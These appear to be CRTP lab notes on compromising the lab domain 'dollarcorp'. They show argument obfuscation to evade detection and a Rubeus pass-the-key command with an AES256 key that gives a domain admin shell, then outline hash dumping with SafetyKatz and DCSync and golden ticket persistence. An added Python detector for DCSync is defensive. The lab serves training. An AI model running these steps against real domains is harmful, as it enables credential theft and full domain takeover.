CRTP Lab 8

Task 1

Extract secrets from the domain controller of dollarcorp.

Since we have DA privileges, we can extract all hashes from the DC.

Let's start a process as DA from an elevated cmd prompt on the student machine.

# Run ArgSplit for asktgt
C:\Users\student372>cd \AD\Tools

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
C:\AD\Tools>set "z=t"
C:\AD\Tools>set "y=g"
C:\AD\Tools>set "x=t"
C:\AD\Tools>set "w=k"
C:\AD\Tools>set "v=s"
C:\AD\Tools>set "u=a"
C:\AD\Tools>set "Pwn=%u%%v%%w%%x%%y%%z%"

# Get DA shell as svcadmin

C:\AD\Tools>C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

To dump hashes:

  • Copy Loader from student to dcorp-dc

  • Spawn cmd on dcorp-dc

  • Set up portforward to run SafetyKatz

  • Finally, run SafetyKatz

Note: "lsadump::lsa /patch" only gives us NTLM hashes.

Let's use DCSync to dump both NTLM and AES hashes.
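A defender's counterpart to the DCSync step, added here as an example that is not part of these lab notes: it flags Security event 4662 entries where an account other than an allow-listed DC computer account exercised the directory replication control-access rights. The flattened log format, the sample account names and the all-zero GUID are constructed for the lab; the three replication-right GUIDs are the real ones.

```python
import re
from typing import Iterable

# Control-access-right GUIDs shown in the Properties field of Security event 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Expected replicators: DC computer accounts. Assumed allow-list for this lab domain.
ALLOWED_REPLICATORS = {"DCORP-DC$"}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

def parse_event(line: str) -> dict:
    """Parse one constructed 'Key=Value;Key=Value' line into a dict."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def detect_dcsync(lines: Iterable[str]) -> list:
    """Return 4662 events where a non-allow-listed account used replication rights."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = (g.lower() for g in GUID_RE.findall(ev.get("Properties", "")))
        rights = sorted({REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS})
        user = ev.get("SubjectUserName", "").upper()
        if not rights or user in ALLOWED_REPLICATORS:
            continue
        hits.append({"user": user, "domain": ev.get("SubjectDomainName", ""),
                     "object": ev.get("ObjectName", ""), "rights": rights})
    return hits

# Constructed sample events flattened to one line each; all-zero GUID = non-replication right.
SAMPLE_LOG = [
    "EventID=4662;SubjectUserName=DCORP-DC$;SubjectDomainName=dcorp;ObjectName=DC=dollarcorp,DC=local;"
    "Properties=Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=svcadmin;SubjectDomainName=dcorp;ObjectName=DC=dollarcorp,DC=local;"
    "Properties=Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectUserName=student372;SubjectDomainName=dcorp;ObjectName=CN=student372,DC=dollarcorp,DC=local;"
    "Properties=Write Property {00000000-0000-0000-0000-000000000000}",
    "EventID=4624;SubjectUserName=svcadmin;SubjectDomainName=dcorp",
]
```

The DC's own replication is allow-listed, so only the svcadmin entry is reported; in production the allow-list also needs any directory-sync service accounts.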

Task 2

Using the secrets of krbtgt account, create a Golden ticket.

Using the KRBTGT hashes, we can now perform a Golden Ticket attack to maintain persistence.

It prints the command to recreate the ticket.

Task 3

Use the Golden ticket to (once again) get domain admin privileges from a machine.

Finally, we can get a shell on dcorp-dc.
